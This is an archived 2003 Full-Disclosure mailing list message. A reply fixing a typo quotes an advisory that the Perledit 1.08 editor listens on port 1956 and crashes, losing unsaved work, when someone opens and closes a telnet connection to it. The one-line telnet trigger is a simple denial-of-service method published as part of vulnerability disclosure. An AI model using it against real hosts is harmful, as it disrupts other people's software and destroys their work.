lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <BC5AE709BCE3524B9D4A70634CB0133BA28598@mail5.tri-c.edu>
From: Marcus.Noel at tri-c.edu (Noel, Marcus)
Subject: Indigoperl Perledit 1.08

s/loosing/losing/

-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
morning_wood
Sent: Wednesday, October 08, 2003 7:55 AM
To: full-disclosure@...ts.netsys.com; support@...igostar.com
Subject: [Full-Disclosure] Indigoperl Perledit 1.08

re: http://lists.insecure.org/lists/bugtraq/2003/Jun/0189.html
still has unresolved issues with the "new" version 1.08 of Indigoperl's
Perledit

perledit binds to 0.0.0.0:1956

[exploit]
c:> telnet perledithost 1956
READY
(terminate telnet)

The instruction at "0x00405430" referenced memory at "0x00000000", The
memory could not be "read"


perledit 1.08 crashes, loosing all unsaved work

Donnie Werner
http://e2-labs.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ